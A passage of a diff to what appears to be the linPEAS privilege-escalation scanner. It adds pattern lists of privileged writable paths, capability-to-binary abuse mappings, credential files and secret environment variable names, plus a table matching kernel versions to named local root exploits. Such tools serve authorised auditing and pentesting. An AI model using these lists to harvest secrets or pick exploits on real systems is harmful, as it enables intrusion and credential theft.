+writeB="00-header|10-help-text|50-motd-news|80-esm|91-release-upgrade|\.sh$|\./|/authorized_keys|/bin/|/boot/|/etc/apache2/apache2.conf|/etc/apache2/httpd.conf|/etc/hosts.allow|/etc/hosts.deny|/etc/httpd/conf/httpd.conf|/etc/httpd/httpd.conf|/etc/inetd.conf|/etc/incron.conf|/etc/login.defs|/etc/logrotate.d/|/etc/modprobe.d/|/etc/pam.d/|/etc/php.*/fpm/pool.d/|/etc/php/.*/fpm/pool.d/|/etc/rsyslog.d/|/etc/skel/|/etc/sysconfig/network-scripts/|/etc/sysctl.conf|/etc/sysctl.d/|/etc/uwsgi/apps-enabled/|/etc/xinetd.conf|/etc/xinetd.d/|/etc/|/home//|/lib/|/log/|/mnt/|/root|/sys/|/usr/bin|/usr/games|/usr/lib|/usr/local/bin|/usr/local/games|/usr/local/sbin|/usr/sbin|/sbin/|/var/log/|\.timer$|\.service$|.socket$" + +OLDPATH=$PATH +ADDPATH=":/usr/local/sbin\ + :/usr/local/bin\ + :/usr/sbin\ + :/usr/bin\ + :/sbin\ + :/bin" +spath=":$PATH" +for P in $ADDPATH; do + if [ "${spath##*$P*}" ]; then export PATH="$PATH$P" 2>/dev/null; fi +done + +writeVB="/etc/anacrontab|/etc/apt/apt.conf.d|/etc/bash.bashrc|/etc/bash_completion|/etc/bash_completion.d/|/etc/cron|/etc/environment|/etc/environment.d/|/etc/group|/etc/incron.d/|/etc/init|/etc/ld.so.conf.d/|/etc/ld.so.preload|/etc/master.passwd|/etc/passwd|/etc/profile.d/|/etc/profile|/etc/rc.d|/etc/shadow|/etc/skey/|/etc/sudoers|/etc/sudoers.d/|/etc/supervisor/conf.d/|/etc/supervisor/supervisord.conf|/etc/systemd|/etc/sys|/lib/systemd|/etc/update-motd.d/|/root/.ssh/|/run/systemd|/usr/lib/cron/tabs/|/usr/lib/systemd|/systemd/system|/var/db/yubikey/|/var/spool/anacron|/var/spool/cron/crontabs|/bin/bash|/usr/bin/bash|/bin/sh|/usr/bin/sh|/bin/dash|/usr/bin/dash|/bin/zsh|/usr/bin/zsh|/usr/bin/env|"$(echo $PATH 2>/dev/null | sed 's/:\.:/:/g' | sed 's/:\.$//g' | sed 's/^\.://g' | sed 's/:/$|^/g') #Add Path but remove simple dot in PATH capsVB="cap_sys_admin:mount|python \ cap_sys_ptrace:python \ cap_sys_module:kmod|python \ cap_dac_override:python|vim \ cap_chown:chown|python \ -cap_former:chown|python \ -cap_setuid:gdb|node|perl|php|python|ruby|rview|rvim|view|vim|vimdiff \ -cap_setgid:gdb|node|perl|php|python|ruby|rview|rvim|view|vim|vimdiff \ -cap_net_raw:python|tcpdump" +cap_fowner:chown|python \ +cap_setfcap:python|perl|ruby|php|node|lua|bash \ +cap_setpcap:python|perl|ruby|php|node|lua|bash \ +cap_setuid:gdb|gzip|node|perl|php|python|ruby|tclsh \ +cap_setgid:gdb|gzip|node|perl|php|python|ruby|tclsh \ +cap_net_raw:python|tcpdump|dumpcap|tcpflow" + +capsB="=ep|cap_chown|cap_fowner|cap_fsetid|cap_setpcap|cap_setfcap|cap_dac_override|cap_dac_read_search|cap_setuid|cap_setgid|cap_kill|cap_net_bind_service|cap_net_raw|cap_net_admin|cap_sys_admin|cap_sys_ptrace|cap_sys_module|cap_sys_rawio|cap_bpf|cap_perfmon" + +ldsoconfdG="/lib32|/lib/x86_64-linux-gnu|/usr/lib32|/usr/lib/oracle/19.6/client64/lib/|/usr/lib/x86_64-linux-gnu/libfakeroot|/usr/lib/x86_64-linux-gnu|/usr/local/lib/x86_64-linux-gnu|/usr/local/lib" profiledG="01-locale-fix.sh|256term.csh|256term.sh|abrt-console-notification.sh|appmenu-qt5.sh|apps-bin-path.sh|bash_completion.sh|cedilla-portuguese.sh|colorgrep.csh|colorgrep.sh|colorls.csh|colorls.sh|colorxzgrep.csh|colorxzgrep.sh|colorzgrep.csh|colorzgrep.sh|csh.local|cursor.sh|gawk.csh|gawk.sh|im-config_wayland.sh|kali.sh|lang.csh|lang.sh|less.csh|less.sh|flatpak.sh|sh.local|vim.csh|vim.sh|vte.csh|vte-2.91.sh|which2.csh|which2.sh|xauthority.sh|Z97-byobu.sh|xdg_dirs_desktop_session.sh|Z99-cloudinit-warnings.sh|Z99-cloud-locale-test.sh" @@ -1111,7 +1156,7 @@ notExtensions="\.tif$|\.tiff$|\.gif$|\.jpeg$|\.jpg|\.jif$|\.jfif$|\.jp2$|\.jpx$| notBackup="/tdbbackup$|/db_hotbackup$" -INT_HIDDEN_FILES=".Xauthority|.bashrc|.bluemix|.boto|.cer|.cloudflared|.credentials.json|.crt|.csr|.db|.der|.docker|.env|.erlang.cookie|.flyrc|.ftpconfig|.git|.git-credentials|.gitconfig|.github|.gnupg|.google_authenticator|.gpg|.htpasswd|.irssi|.jks|.k5login|.kdbx|.key|.keyring|.keystore|.keytab|.kube|.ldaprc|.lesshst|.mozilla|.msmtprc|.ovpn|.p12|.password-store|.pem|.pfx|.pgp|.plan|.profile|.psk|.pub|.pypirc|.rdg|.recently-used.xbel|.rhosts|.roadtools_auth|.secrets.mkey|.service|.socket|.sqlite|.sqlite3|.sudo_as_admin_successful|.svn|.swp|.tf|.tfstate|.timer|.vault-token|.vhd|.vhdx|.viminfo|.vmdk|.vnc|.wgetrc" +INT_HIDDEN_FILES=".Xauthority|.asc|.bashrc|.bluemix|.boto|.cer|.claude|.claude.json|.cloudflared|.codex|.credentials.json|.crt|.csr|.cursor|.db|.der|.docker|.env|.erlang.cookie|.flyrc|.ftpconfig|.gemini|.git|.git-credentials|.gitconfig|.github|.gnupg|.google_authenticator|.gpg|.htpasswd|.irssi|.jks|.k5login|.kdbx|.key|.keyring|.keystore|.keytab|.kube|.ldaprc|.lesshst|.maintenance|.mcp.json|.mozilla|.msmtprc|.mylogin.cnf|.ovpn|.p12|.password-store|.pcap|.pcapng|.pem|.pfx|.pgp|.pgpass|.plan|.profile|.psk|.pub|.pypirc|.rdg|.recently-used.xbel|.rhosts|.roadtools_auth|.secrets.mkey|.service|.socket|.sqlite|.sqlite3|.sudo_as_admin_successful|.svn|.swp|.tf|.tfstate|.timer|.vault-token|.vhd|.vhdx|.viminfo|.vmdk|.vnc|.wgetrc" shscripsG="/0trace.sh|/alsa-info.sh|amuFormat.sh|/blueranger.sh|/crosh.sh|/dnsmap-bulk.sh|/dockerd-rootless.sh|/dockerd-rootless-setuptool.sh|/get_bluetooth_device_class.sh|/gettext.sh|/go-rhn.sh|/gvmap.sh|/kernel_log_collector.sh|/lesspipe.sh|/lprsetup.sh|/mksmbpasswd.sh|/pm-utils-bugreport-info.sh|/power_report.sh|/prl-opengl-switcher.sh|/setuporamysql.sh|/setup-nsssysinit.sh|/readlink_f.sh|/rescan-scsi-bus.sh|/start_bluetoothd.sh|/start_bluetoothlog.sh|/testacg.sh|/testlahf.sh|/unix-lpr.sh|/url_handler.sh|/write_gpt.sh" @@ -1131,7 +1176,7 @@ pwd_in_variables7="MAILGUN_APIKEY|MAILGUN_API_KEY|MAILGUN_DOMAIN|MAILGUN_PRIV_KE pwd_in_variables8="OKTA_OAUTH2_ISSUER|OMISE_KEY|OMISE_PKEY|OMISE_PUBKEY|OMISE_SKEY|ONESIGNAL_API_KEY|ONESIGNAL_USER_AUTH_KEY|OPENWHISK_KEY|OPEN_WHISK_KEY|OSSRH_PASS|OSSRH_SECRET|OSSRH_USER|OS_AUTH_URL|OS_PROJECT_NAME|OS_TENANT_ID|OS_TENANT_NAME|PAGERDUTY_APIKEY|PAGERDUTY_ESCALATION_POLICY_ID|PAGERDUTY_FROM_USER|PAGERDUTY_PRIORITY_ID|PAGERDUTY_SERVICE_ID|PANTHEON_SITE|PARSE_APP_ID|PARSE_JS_KEY|PAYPAL_CLIENT_ID|PAYPAL_CLIENT_SECRET|PERCY_TOKEN|PERSONAL_KEY|PERSONAL_SECRET|PG_DATABASE|PG_HOST|PLACES_APIKEY|PLACES_API_KEY|PLACES_APPID|PLACES_APPLICATION_ID|PLOTLY_APIKEY|POSTGRESQL_DB|POSTGRESQL_PASS|POSTGRES_ENV_POSTGRES_DB|POSTGRES_ENV_POSTGRES_USER|POSTGRES_PORT|PREBUILD_AUTH|PROD.ACCESS.KEY.ID|PROD.SECRET.KEY|PROD_BASE_URL_RUNSCOPE|PROJECT_CONFIG|PUBLISH_KEY|PUBLISH_SECRET|PUSHOVER_TOKEN|PUSHOVER_USER|PYPI_PASSOWRD|QUIP_TOKEN|RABBITMQ_SERVER_ADDR|REDISCLOUD_URL|REDIS_STUNNEL_URLS|REFRESH_TOKEN|RELEASE_GH_TOKEN|RELEASE_TOKEN|remoteUserToShareTravis|REPORTING_WEBDAV_URL|REPORTING_WEBDAV_USER|repoToken|REST_API_KEY|RINKEBY_PRIVATE_KEY|ROPSTEN_PRIVATE_KEY|route53_access_key_id|RTD_KEY_PASS|RTD_STORE_PASS|RUBYGEMS_AUTH_TOKEN|s3_access_key|S3_ACCESS_KEY_ID|S3_BUCKET_NAME_APP_LOGS|S3_BUCKET_NAME_ASSETS|S3_KEY" pwd_in_variables9="S3_KEY_APP_LOGS|S3_KEY_ASSETS|S3_PHOTO_BUCKET|S3_SECRET_APP_LOGS|S3_SECRET_ASSETS|S3_SECRET_KEY|S3_USER_ID|S3_USER_SECRET|SACLOUD_ACCESS_TOKEN|SACLOUD_ACCESS_TOKEN_SECRET|SACLOUD_API|SALESFORCE_BULK_TEST_SECURITY_TOKEN|SANDBOX_ACCESS_TOKEN|SANDBOX_AWS_ACCESS_KEY_ID|SANDBOX_AWS_SECRET_ACCESS_KEY|SANDBOX_LOCATION_ID|SAUCE_ACCESS_KEY|SECRETACCESSKEY|SECRETKEY|SECRET_0|SECRET_10|SECRET_11|SECRET_1|SECRET_2|SECRET_3|SECRET_4|SECRET_5|SECRET_6|SECRET_7|SECRET_8|SECRET_9|SECRET_KEY_BASE|SEGMENT_API_KEY|SELION_SELENIUM_SAUCELAB_GRID_CONFIG_FILE|SELION_SELENIUM_USE_SAUCELAB_GRID|SENDGRID|SENDGRID_API_KEY|SENDGRID_FROM_ADDRESS|SENDGRID_KEY|SENDGRID_USER|SENDWITHUS_KEY|SENTRY_AUTH_TOKEN|SERVICE_ACCOUNT_SECRET|SES_ACCESS_KEY|SES_SECRET_KEY|setDstAccessKey|setDstSecretKey|setSecretKey|SIGNING_KEY|SIGNING_KEY_SECRET|SIGNING_KEY_SID|SNOOWRAP_CLIENT_SECRET|SNOOWRAP_REDIRECT_URI|SNOOWRAP_REFRESH_TOKEN|SNOOWRAP_USER_AGENT|SNYK_API_TOKEN|SNYK_ORG_ID|SNYK_TOKEN|SOCRATA_APP_TOKEN|SOCRATA_USER|SONAR_ORGANIZATION_KEY|SONAR_PROJECT_KEY|SONAR_TOKEN|SONATYPE_GPG_KEY_NAME|SONATYPE_GPG_PASSPHRASE|SONATYPE_PASSSONATYPE_TOKEN_USER|SONATYPE_USER|SOUNDCLOUD_CLIENT_ID|SOUNDCLOUD_CLIENT_SECRET|SPACES_ACCESS_KEY_ID|SPACES_SECRET_ACCESS_KEY" pwd_in_variables10="SPA_CLIENT_ID|SPOTIFY_API_ACCESS_TOKEN|SPOTIFY_API_CLIENT_ID|SPOTIFY_API_CLIENT_SECRET|sqsAccessKey|sqsSecretKey|SRCCLR_API_TOKEN|SSHPASS|SSMTP_CONFIG|STARSHIP_ACCOUNT_SID|STARSHIP_AUTH_TOKEN|STAR_TEST_AWS_ACCESS_KEY_ID|STAR_TEST_BUCKET|STAR_TEST_LOCATION|STAR_TEST_SECRET_ACCESS_KEY|STORMPATH_API_KEY_ID|STORMPATH_API_KEY_SECRET|STRIPE_PRIVATE|STRIPE_PUBLIC|STRIP_PUBLISHABLE_KEY|STRIP_SECRET_KEY|SURGE_LOGIN|SURGE_TOKEN|SVN_PASS|SVN_USER|TESCO_API_KEY|THERA_OSS_ACCESS_ID|THERA_OSS_ACCESS_KEY|TRAVIS_ACCESS_TOKEN|TRAVIS_API_TOKEN|TRAVIS_COM_TOKEN|TRAVIS_E2E_TOKEN|TRAVIS_GH_TOKEN|TRAVIS_PULL_REQUEST|TRAVIS_SECURE_ENV_VARS|TRAVIS_TOKEN|TREX_CLIENT_ORGURL|TREX_CLIENT_TOKEN|TREX_OKTA_CLIENT_ORGURL|TREX_OKTA_CLIENT_TOKEN|TWILIO_ACCOUNT_ID|TWILIO_ACCOUNT_SID|TWILIO_API_KEY|TWILIO_API_SECRET|TWILIO_CHAT_ACCOUNT_API_SERVICE|TWILIO_CONFIGURATION_SID|TWILIO_SID|TWILIO_TOKEN|TWITTEROAUTHACCESSSECRET|TWITTEROAUTHACCESSTOKEN|TWITTER_CONSUMER_KEY|TWITTER_CONSUMER_SECRET|UNITY_SERIAL|URBAN_KEY|URBAN_MASTER_SECRET|URBAN_SECRET|userTravis|USER_ASSETS_ACCESS_KEY_ID|USER_ASSETS_SECRET_ACCESS_KEY|VAULT_APPROLE_SECRET_ID|VAULT_PATH|VIP_GITHUB_BUILD_REPO_DEPLOY_KEY|VIP_GITHUB_DEPLOY_KEY|VIP_GITHUB_DEPLOY_KEY_PASS" -pwd_in_variables11="VIRUSTOTAL_APIKEY|VISUAL_RECOGNITION_API_KEY|V_SFDC_CLIENT_ID|V_SFDC_CLIENT_SECRET|WAKATIME_API_KEY|WAKATIME_PROJECT|WATSON_CLIENT|WATSON_CONVERSATION_WORKSPACE|WATSON_DEVICE|WATSON_DEVICE_TOPIC|WATSON_TEAM_ID|WATSON_TOPIC|WIDGET_BASIC_USER_2|WIDGET_BASIC_USER_3|WIDGET_BASIC_USER_4|WIDGET_BASIC_USER_5|WIDGET_FB_USER|WIDGET_FB_USER_2|WIDGET_FB_USER_3|WIDGET_TEST_SERVERWORDPRESS_DB_USER|WORKSPACE_ID|WPJM_PHPUNIT_GOOGLE_GEOCODE_API_KEY|WPT_DB_HOST|WPT_DB_NAME|WPT_DB_USER|WPT_PREPARE_DIR|WPT_REPORT_API_KEY|WPT_SSH_CONNECT|WPT_SSH_PRIVATE_KEY_BASE64|YANGSHUN_GH_TOKEN|YT_ACCOUNT_CHANNEL_ID|YT_ACCOUNT_CLIENT_ID|YT_ACCOUNT_CLIENT_SECRET|YT_ACCOUNT_REFRESH_TOKEN|YT_API_KEY|YT_CLIENT_ID|YT_CLIENT_SECRET|YT_PARTNER_CHANNEL_ID|YT_PARTNER_CLIENT_ID|YT_PARTNER_CLIENT_SECRET|YT_PARTNER_ID|YT_PARTNER_REFRESH_TOKEN|YT_SERVER_API_KEY|ZHULIANG_GH_TOKEN|ZOPIM_ACCOUNT_KEY" +pwd_in_variables11="VIRUSTOTAL_APIKEY|VISUAL_RECOGNITION_API_KEY|V_SFDC_CLIENT_ID|V_SFDC_CLIENT_SECRET|WAKATIME_API_KEY|WAKATIME_PROJECT|WATSON_CLIENT|WATSON_CONVERSATION_WORKSPACE|WATSON_DEVICE|WATSON_DEVICE_TOPIC|WATSON_TEAM_ID|WATSON_TOPIC|WIDGET_BASIC_USER_2|WIDGET_BASIC_USER_3|WIDGET_BASIC_USER_4|WIDGET_BASIC_USER_5|WIDGET_FB_USER|WIDGET_FB_USER_2|WIDGET_FB_USER_3|WIDGET_TEST_SERVERWORDPRESS_DB_USER|WORKSPACE_ID|WPJM_PHPUNIT_GOOGLE_GEOCODE_API_KEY|WPT_DB_HOST|WPT_DB_NAME|WPT_DB_USER|WPT_PREPARE_DIR|WPT_REPORT_API_KEY|WPT_SSH_CONNECT|WPT_SSH_PRIVATE_KEY_BASE64|YANGSHUN_GH_TOKEN|YT_ACCOUNT_CHANNEL_ID|YT_ACCOUNT_CLIENT_ID|YT_ACCOUNT_CLIENT_SECRET|YT_ACCOUNT_REFRESH_TOKEN|YT_API_KEY|YT_CLIENT_ID|YT_CLIENT_SECRET|YT_PARTNER_CHANNEL_ID|YT_PARTNER_CLIENT_ID|YT_PARTNER_CLIENT_SECRET|YT_PARTNER_ID|YT_PARTNER_REFRESH_TOKEN|YT_SERVER_API_KEY|ZHULIANG_GH_TOKEN|ZOPIM_ACCOUNT_KEY|USERNAME|PASSWORD|PASSWD|CREDENTIALS?" NoEnvVars="LESS_TERMCAP|JOURNAL_STREAM|XDG_SESSION|DBUS_SESSION|systemd\/sessions|systemd_exec|MEMORY_PRESSURE_WATCH|RELEVANT*|FIND*|^VERSION=|dbuslistG|mygroups|ldsoconfdG|pwd_inside_history|kernelDCW_Ubuntu_Precise|kernelDCW_Ubuntu_Trusty|kernelDCW_Ubuntu_Xenial|kernelDCW_Rhel|^sudovB=|^rootcommon=|^mounted=|^mountG=|^notmounted=|^mountpermsB=|^mountpermsG=|^kernelB=|^C=|^RED=|^GREEN=|^Y=|^B=|^NC=|TIMEOUT=|groupsB=|groupsVB=|knw_grps=|sidG|sidB=|sidVB=|sidVB2=|sudoB=|sudoG=|sudoVB=|timersG=|capsB=|notExtensions=|Wfolders=|writeB=|writeVB=|_usrs=|compiler=|LS_COLORS=|pathshG=|notBackup=|processesDump|processesB|commonrootdirs|USEFUL_SOFTWARE|PSTORAGE_|^PATH=|^INVOCATION_ID=|^WATCHDOG_PID=|^LISTEN_PID=" @@ -1143,12 +1188,584 @@ commonrootdirsMacG="^/$|/.DocumentRevisions-V100|/.fseventsd|/.PKInstallSandboxM TIMEOUT="$(command -v timeout 2>/dev/null || echo -n '')" +# Max 25 rows per env variable to avoid hitting env variable size limits. +KERNEL_CVE_DATA_1="$(cat <<'EOF_DATA_1' +CVE-2004-1235 elflbl pkg=linux-kernel,ver=2.4.29 1 +CVE-2004-1235 uselib() pkg=linux-kernel,ver=2.4.29 1 Known to work only for 2.4 series (even though 2.6 is also vulnerable) +CVE-2004-1235 krad3 pkg=linux-kernel,ver>=2.6.5,ver<=2.6.11 1 +CVE-2004-0077 mremap_pte pkg=linux-kernel,ver>=2.6.0,ver<=2.6.2 1 +CVE-2006-2451 raptor_prctl pkg=linux-kernel,ver>=2.6.13,ver<=2.6.17 1 +CVE-2006-2451 prctl pkg=linux-kernel,ver>=2.6.13,ver<=2.6.17 1 +CVE-2006-2451 prctl2 pkg=linux-kernel,ver>=2.6.13,ver<=2.6.17 1 +CVE-2006-2451 prctl3 pkg=linux-kernel,ver>=2.6.13,ver<=2.6.17 1 +CVE-2006-2451 prctl4 pkg=linux-kernel,ver>=2.6.13,ver<=2.6.17 1 +CVE-2006-3626 h00lyshit pkg=linux-kernel,ver>=2.6.8,ver<=2.6.16 1 +CVE-2008-0600 vmsplice1 pkg=linux-kernel,ver>=2.6.17,ver<=2.6.24 1 +CVE-2008-0600 vmsplice2 pkg=linux-kernel,ver>=2.6.23,ver<=2.6.24 1 +CVE-2008-4210 ftrex pkg=linux-kernel,ver>=2.6.11,ver<=2.6.22 1 world-writable sgid directory and shell that does not drop sgid privs upon exec (ash/sash) are required +CVE-2008-4210 exit_notify pkg=linux-kernel,ver>=2.6.25,ver<=2.6.29 1 +CVE-2009-2692 sock_sendpage (simple version) pkg=linux-kernel,ver>=2.6.0,ver<=2.6.30 ubuntu=7.10,RHEL=4,fedora=4|5|6|7|8|9|10|11 1 Works for systems with /proc/sys/vm/mmap_min_addr equal to 0 +CVE-2009-2692,CVE-2009-1895 sock_sendpage pkg=linux-kernel,ver>=2.6.0,ver<=2.6.30 ubuntu=9.04 1 /proc/sys/vm/mmap_min_addr needs to equal 0 OR pulseaudio needs to be installed +CVE-2009-2692,CVE-2009-1895 sock_sendpage2 pkg=linux-kernel,ver>=2.6.0,ver<=2.6.30 1 Works for systems with /proc/sys/vm/mmap_min_addr equal to 0 +CVE-2009-2692,CVE-2009-1895 sock_sendpage3 pkg=linux-kernel,ver>=2.6.0,ver<=2.6.30 1 /proc/sys/vm/mmap_min_addr needs to equal 0 OR pulseaudio needs to be installed +CVE-2009-2692,CVE-2009-1895 sock_sendpage (ppc) pkg=linux-kernel,ver>=2.6.0,ver<=2.6.30 ubuntu=8.10,RHEL=4|5 1 /proc/sys/vm/mmap_min_addr needs to equal 0 +CVE-2009-2698 the rebel (udp_sendmsg) pkg=linux-kernel,ver>=2.6.1,ver<=2.6.19 debian=4 1 /proc/sys/vm/mmap_min_addr needs to equal 0 OR pulseaudio needs to be installed +CVE-2009-2698 hoagie_udp_sendmsg pkg=linux-kernel,ver>=2.6.1,ver<=2.6.19,x86 debian=4 1 Works for systems with /proc/sys/vm/mmap_min_addr equal to 0 +CVE-2009-2698 katon (udp_sendmsg) pkg=linux-kernel,ver>=2.6.1,ver<=2.6.19,x86 debian=4 1 Works for systems with /proc/sys/vm/mmap_min_addr equal to 0 +CVE-2009-2698 ip_append_data pkg=linux-kernel,ver>=2.6.1,ver<=2.6.19,x86 fedora=4|5|6,RHEL=4 1 Works for systems with /proc/sys/vm/mmap_min_addr equal to 0 +CVE-2009-3547 pipe.c 1 pkg=linux-kernel,ver>=2.6.0,ver<=2.6.31 1 +CVE-2009-3547 pipe.c 2 pkg=linux-kernel,ver>=2.6.0,ver<=2.6.31 1 +EOF_DATA_1 +)" +KERNEL_CVE_DATA_2="$(cat <<'EOF_DATA_2' +CVE-2009-3547 pipe.c 3 pkg=linux-kernel,ver>=2.6.0,ver<=2.6.31 1 +CVE-2010-3301 ptrace_kmod2 pkg=linux-kernel,ver>=2.6.26,ver<=2.6.34 debian=6.0{kernel:2.6.(32|33|34|35)-(1|2|trunk)-amd64},ubuntu=(10.04|10.10){kernel:2.6.(32|35)-(19|21|24)-server} 1 +CVE-2010-1146 reiserfs pkg=linux-kernel,ver>=2.6.18,ver<=2.6.34 ubuntu=9.10 1 +CVE-2010-2959 can_bcm pkg=linux-kernel,ver>=2.6.18,ver<=2.6.36 ubuntu=10.04{kernel:2.6.32-24-generic} 1 +CVE-2010-3904 rds pkg=linux-kernel,ver>=2.6.30,ver<2.6.37 debian=6.0{kernel:2.6.(31|32|34|35)-(1|trunk)-amd64},ubuntu=10.10|9.10,fedora=13{kernel:2.6.33.3-85.fc13.i686.PAE},ubuntu=10.04{kernel:2.6.32-(21|24)-generic} 1 +CVE-2010-3848,CVE-2010-3850,CVE-2010-4073 half_nelson pkg=linux-kernel,ver>=2.6.0,ver<=2.6.36 ubuntu=(10.04|9.10){kernel:2.6.(31|32)-(14|21)-server} 1 +N/A caps_to_root pkg=linux-kernel,ver>=2.6.34,ver<=2.6.36,x86 ubuntu=10.10 1 +N/A caps_to_root 2 pkg=linux-kernel,ver>=2.6.34,ver<=2.6.36 ubuntu=10.10 1 +CVE-2010-4347 american-sign-language pkg=linux-kernel,ver>=2.6.0,ver<=2.6.36 1 +CVE-2010-3437 pktcdvd pkg=linux-kernel,ver>=2.6.0,ver<=2.6.36 ubuntu=10.04 1 +CVE-2010-3081 video4linux pkg=linux-kernel,ver>=2.6.0,ver<=2.6.33 RHEL=5 1 +CVE-2012-0056 memodipper pkg=linux-kernel,ver>=3.0.0,ver<=3.1.0 ubuntu=(10.04|11.10){kernel:3.0.0-12-(generic|server)} 1 +CVE-2012-0056,CVE-2010-3849,CVE-2010-3850 full-nelson pkg=linux-kernel,ver>=2.6.0,ver<=2.6.36 ubuntu=(9.10|10.10){kernel:2.6.(31|35)-(14|19)-(server|generic)},ubuntu=10.04{kernel:2.6.32-(21|24)-server} 1 +CVE-2013-1858 CLONE_NEWUSER|CLONE_FS pkg=linux-kernel,ver=3.8,CONFIG_USER_NS=y 1 CONFIG_USER_NS needs to be enabled +CVE-2013-2094 perf_swevent pkg=linux-kernel,ver>=2.6.32,ver<3.8.9,x86_64 RHEL=6,ubuntu=12.04{kernel:3.2.0-(23|29)-generic},fedora=16{kernel:3.1.0-7.fc16.x86_64},fedora=17{kernel:3.3.4-5.fc17.x86_64},debian=7{kernel:3.2.0-4-amd64} 1 No SMEP/SMAP bypass +CVE-2013-2094 perf_swevent 2 pkg=linux-kernel,ver>=2.6.32,ver<3.8.9,x86_64 ubuntu=12.04{kernel:3.(2|5).0-(23|29)-generic} 1 No SMEP/SMAP bypass +CVE-2013-0268 msr pkg=linux-kernel,ver>=2.6.18,ver<3.7.6 1 +CVE-2013-1959 userns_root_sploit pkg=linux-kernel,ver>=3.0.1,ver<3.8.9 1 +CVE-2013-2094 semtex pkg=linux-kernel,ver>=2.6.32,ver<3.8.9 RHEL=6 1 +CVE-2014-0038 timeoutpwn pkg=linux-kernel,ver>=3.4.0,ver<=3.13.1,CONFIG_X86_X32=y ubuntu=13.10 1 CONFIG_X86_X32 needs to be enabled +CVE-2014-0038 timeoutpwn 2 pkg=linux-kernel,ver>=3.4.0,ver<=3.13.1,CONFIG_X86_X32=y ubuntu=(13.04|13.10){kernel:3.(8|11).0-(12|15|19)-generic} 1 CONFIG_X86_X32 needs to be enabled +CVE-2014-0196 rawmodePTY pkg=linux-kernel,ver>=2.6.31,ver<=3.14.3 1 +CVE-2014-2851 use-after-free in ping_init_sock() (DoS) pkg=linux-kernel,ver>=3.0.1,ver<=3.14 0 +CVE-2014-4014 inode_capable pkg=linux-kernel,ver>=3.0.1,ver<=3.13 ubuntu=12.04 1 +CVE-2014-4699 ptrace/sysret pkg=linux-kernel,ver>=3.0.1,ver<=3.8 ubuntu=12.04 1 +EOF_DATA_2 +)" +KERNEL_CVE_DATA_3="$(cat <<'EOF_DATA_3' +CVE-2014-4943 PPPoL2TP (DoS) pkg=linux-kernel,ver>=3.2,ver<=3.15.6 1 +CVE-2014-5207 fuse_suid pkg=linux-kernel,ver>=3.0.1,ver<=3.16.1 1 +CVE-2015-9322 BadIRET pkg=linux-kernel,ver>=3.0.1,ver<3.17.5,x86_64 RHEL<=7,fedora=20 1 +CVE-2015-3290 espfix64_NMI pkg=linux-kernel,ver>=3.13,ver<4.1.6,x86_64 1 +N/A bluetooth pkg=linux-kernel,ver<=2.6.11 1 +CVE-2015-1328 overlayfs pkg=linux-kernel,ver>=3.13.0,ver<=3.19.0 ubuntu=(12.04|14.04){kernel:3.13.0-(2|3|4|5)*-generic},ubuntu=(14.10|15.04){kernel:3.(13|16).0-*-generic} 1 +CVE-2015-8660 overlayfs (ovl_setattr) pkg=linux-kernel,ver>=3.0.0,ver<=4.3.3 1 +CVE-2015-8660 overlayfs (ovl_setattr) pkg=linux-kernel,ver>=3.0.0,ver<=4.3.3 ubuntu=(14.04|15.10){kernel:4.2.0-(18|19|20|21|22)-generic} 1 +CVE-2016-0728 keyring pkg=linux-kernel,ver>=3.10,ver<4.4.1 0 Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working +CVE-2016-2384 usb-midi pkg=linux-kernel,ver>=3.0.0,ver<=4.4.8 ubuntu=14.04,fedora=22 1 Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user +CVE-2016-4997 target_offset pkg=linux-kernel,ver>=4.4.0,ver<=4.4.0,cmd:grep -qi ip_tables /proc/modules ubuntu=16.04{kernel:4.4.0-21-generic} 1 ip_tables.ko needs to be loaded +CVE-2016-4557 double-fdput() pkg=linux-kernel,ver>=4.4,ver<4.5.5,CONFIG_BPF_SYSCALL=y,sysctl:kernel.unprivileged_bpf_disabled!=1 ubuntu=16.04{kernel:4.4.0-21-generic} 1 CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1 +CVE-2016-5195 dirtycow pkg=linux-kernel,ver>=2.6.22,ver<=4.8.3 debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04 4 For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh +CVE-2016-5195 dirtycow 2 pkg=linux-kernel,ver>=2.6.22,ver<=4.8.3 debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic} 4 For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh +CVE-2016-8655 chocobo_root pkg=linux-kernel,ver>=4.4.0,ver<4.9,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1 ubuntu=(14.04|16.04){kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic} 1 CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled +CVE-2016-9793 SO_{SND|RCV}BUFFORCE pkg=linux-kernel,ver>=3.11,ver<4.8.14,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1 1 CAP_NET_ADMIN caps OR CONFIG_USER_NS=y needed. No SMEP/SMAP/KASLR bypass included. Tested in QEMU only +CVE-2017-6074 dccp pkg=linux-kernel,ver>=2.6.18,ver<=4.9.11,CONFIG_IP_DCCP=[my] ubuntu=(14.04|16.04){kernel:4.4.0-62-generic} 1 Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass +CVE-2017-7308 af_packet pkg=linux-kernel,ver>=3.2,ver<=4.10.6,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1 ubuntu=16.04{kernel:4.8.0-(34|36|39|41|42|44|45)-generic} 1 CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels +CVE-2017-16995 eBPF_verifier pkg=linux-kernel,ver>=4.4,ver<=4.14.8,CONFIG_BPF_SYSCALL=y,sysctl:kernel.unprivileged_bpf_disabled!=1 debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},ubuntu=(16.04|17.04){kernel:4.(8|10).0-(19|28|45)-generic} 5 